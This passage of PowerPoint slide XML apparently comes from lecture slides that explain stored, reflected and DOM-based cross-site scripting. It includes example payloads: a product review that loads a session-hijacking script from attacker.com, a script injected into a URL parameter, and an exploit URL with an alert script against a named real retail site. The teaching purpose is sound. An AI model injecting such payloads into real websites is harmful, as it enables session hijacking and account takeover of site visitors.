          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>XSS categories : </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2203142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38039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67EBE94E-B2DD-C357-5095-43F5D2001CF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1497595" y="1671359"/>
            <a:ext cx="6228182" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Types of XSS Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 2" descr="What is Cross-Site Scripting (XSS)? How to Prevent it? | Fortinet">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{889270DF-026C-910E-C86E-3B586BDF4F1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12987" y="2850930"/>
            <a:ext cx="4597399" cy="300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34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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D56413E5-E588-9FD2-4AE6-791CA260DF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0640" y="2614623"/>
            <a:ext cx="6199122"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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6880EB71-A9B9-8A29-8084-49322D110C95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2366301" y="2644766"/>
            <a:ext cx="53829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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="408962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50436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3829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123CA88-6258-CEB5-5A9F-4E486A2629DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="336580" y="2052578"/>
            <a:ext cx="8007982" cy="3477875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>Stored/Persistent Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Stored XSS involves an application receiving data from a malicious source and storing the data for use in later HTTP responses. This is also known as second-order or persistent XSS, because it persists in the system. </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The data can come from any untrusted source that sends an HTTP request to the application, such as comments posted on a blog or an application that displays messages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B36383AD-2493-BB84-A95E-F6A5066834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78214"/>
            <a:ext cx="950436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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62C74FC8-CD31-E692-174C-36DCCBA0C5B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2651125" y="524264"/>
            <a:ext cx="53829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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2072274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50436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3829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123CA88-6258-CEB5-5A9F-4E486A2629DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="303212" y="2204284"/>
            <a:ext cx="7637139"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t>An example of a stored XSS attack is an Ecommerce website that allows customers to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>post reviews </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>of products. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Now consider that the mechanism used to publish reviews does not properly sanitize user inputs, allowing attackers to embed HTML tags in the text they submit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="535330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11701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4647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FFB3ADD9-94BD-9393-9D0E-9B906813FB57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="466127" y="1425595"/>
            <a:ext cx="7981214" cy="4570929"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1663991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11701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4647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https://www.owasp.org/images/4/49/XSSStored1.PNG">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14D6DE0A-0EF0-7D9E-FB3C-F6BF5EA185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200" y="2521242"/>
            <a:ext cx="7845425" cy="405015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7019D88-F966-C308-EBA4-0895BF229739}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="61119" y="1751033"/>
            <a:ext cx="8614569" cy="3989898"/>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sz="1800" dirty="0"/>
              <a:t>If we have a site that permits us to leave a message to the other user and we inject a script instead of a message in the following way:</a:t>
            </a:r>
            <a:endParaRPr lang="ar-SA" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41900466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911701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4647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6" descr="File:XSSStored2.PNG">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9F61043-5F95-6D63-E400-E75E47D9159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04690" y="2878137"/>
            <a:ext cx="5715000" cy="356235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2BCD828-8A41-A095-8EA9-35EEE3A018BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="7615335" cy="917575"/>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sz="1800"/>
              <a:t>Now the server will store this information and when a user clicks on our fake message, his browser will execute our script as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="ar-SA" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1531088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80454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61586"/>
            <a:ext cx="53829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Stored Scripting</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1134205-3354-17BC-94D8-DED28925E4B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014411" y="1997839"/>
            <a:ext cx="7554913" cy="3477875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>For example, an attacker could submit review text like this:</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Really enjoyed this product, highly recommend it. “&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>=”http://attacker.com/sessionhijack.js”&gt; &lt;/script&gt;”</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The review is published on the page, and loads for every user who views the page (hence this is a stored XSS attack). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>When a new visitor loads the page, the malicious JavaScript is executed, attackers hijack the user’s session, and can impersonate them on the site from this point onwards.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="836830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9754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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D56413E5-E588-9FD2-4AE6-791CA260DF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0640" y="2614623"/>
            <a:ext cx="6199122"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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6880EB71-A9B9-8A29-8084-49322D110C95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2366301" y="2644766"/>
            <a:ext cx="503458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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39427994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7735887"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0345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26F7750-0235-0E52-03AF-2A2EB7A9B277}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742270" y="2205038"/>
            <a:ext cx="7517491" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Reflected Cross-site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Reflected XSS is a simple form of cross-site scripting that involves an application “reflecting” malicious code received via an HTTP request. As a result of an XSS vulnerability, the application accepts malicious code from the user and includes it in its response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Non-Persistent  or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Nonaltering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. </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3206525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285022"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03458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68B638F-BC9F-B1CB-E88C-3A31113A2B34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1255713" y="1743373"/>
            <a:ext cx="6228182" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54C544CF-9B16-53A7-1514-14613E89A81B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200944" y="2314873"/>
            <a:ext cx="6228182" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>A reflected XSS vulnerability happens when the user input from a URL or POST data is reflected on the page without being stored. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>This means that an attacker has to send a crafted link or post form to the victim to insert the payload, and the victim should click the link.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>This kind of payload is also generally being caught by built in browser XSS filters, like in Chrome, Internet Explorer or Edge.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25971397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0232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03458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80400824-81EB-0562-9A83-3675B5D3B52C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1035881" y="1583690"/>
            <a:ext cx="8992357" cy="4219908"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2603328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7735887"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0345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26F7750-0235-0E52-03AF-2A2EB7A9B277}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404133" y="1756130"/>
            <a:ext cx="7993418" cy="3631763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>For example, suppose a website encodes a message in a URL parameter. If the application does not sanitize the input provided by the URL parameter, an attacker can inject a malicious script into it, like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>https://web-app.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>status?message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;/*+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious+code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>...+*/&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;p&gt;&lt;script&gt;/*+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>malicious+code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>...+*/&lt;/script&gt;&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>When a user visits the page, the attacker’s script executes, and the script now has access to any action or data that the user can access. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4236959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716183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503458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Reflected XSS</a:t>
            </a:r>
          </a:p>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675FDCA3-9667-84DB-CD17-43C6296CA540}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="303211" y="1807319"/>
            <a:ext cx="8178316" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" dirty="0"/>
              <a:t>Exploit URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" dirty="0"/>
              <a:t>http://www.nikebiz.com/search/?q=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert('XSS')&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" dirty="0"/>
              <a:t>&amp;x=0&amp;y=0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ar-SA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" dirty="0"/>
              <a:t>HTML returned to victim:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" dirty="0"/>
              <a:t>&lt;div id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" dirty="0" err="1"/>
              <a:t>pageTitleTxt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" dirty="0"/>
              <a:t>"&gt; &lt;h2&gt;&lt;span class="highlight"&gt;Search Results&lt;/span&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" dirty="0"/>
              <a:t> /&gt; Search: "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert('XSS')&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" dirty="0"/>
              <a:t>"&lt;/h2&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E90D011-6EB6-7441-C253-2A4A90590711}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2150853" y="1425595"/>
            <a:ext cx="6228182" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" b="1" dirty="0"/>
              <a:t>Reflected XSS Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83C3E75B-6242-DD2D-7614-C1947A9126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1989" y="3586888"/>
            <a:ext cx="7490292" cy="2883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467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2" y="2831307"/>
            <a:ext cx="7487849"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1014412" y="2990384"/>
            <a:ext cx="6170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0206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34547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297001" y="535956"/>
            <a:ext cx="625203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52061"/>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659088A-94C0-A8D9-220A-A11BC43647F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269876" y="1601324"/>
            <a:ext cx="8191500" cy="3816429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>DOM-based Cross-site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>The Document Object Model (DOM) is interface (API) for HTML and XML documents. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>The DOM is an internal data structure that stores all of the objects and properties of a web page. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For example, every tag used in HTML code represents a DOM object.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> Additionally, the DOM of a web page contains information about such properties as the page URL and meta information. Developers may refer to these objects and properties using JavaScript and change them dynamically.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1027654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34547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297001" y="535956"/>
